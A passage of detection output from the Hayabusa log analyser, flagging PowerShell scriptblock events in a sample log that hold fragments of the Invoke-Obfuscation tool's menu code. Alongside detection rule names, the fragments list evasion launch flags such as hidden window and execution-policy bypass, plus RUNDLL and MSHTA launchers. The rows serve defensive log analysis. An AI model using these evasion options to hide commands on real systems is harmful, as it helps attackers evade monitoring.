'2' , '-NonInteractive'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. $TutorialInputOptions = @(@('tutorial') , "" of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , "" for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , "" screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , "" ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , "" ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , "" ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , "" LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , "" Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. $AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. $AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] $StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. $TutorialInputOptions = @(@('tutorial') , "" of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , "" for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , "" screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , "" ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , "" ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , "" ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , "" LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , "" Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. $AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. $AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] $StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { $NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. $UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. # Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. # Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). $TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { 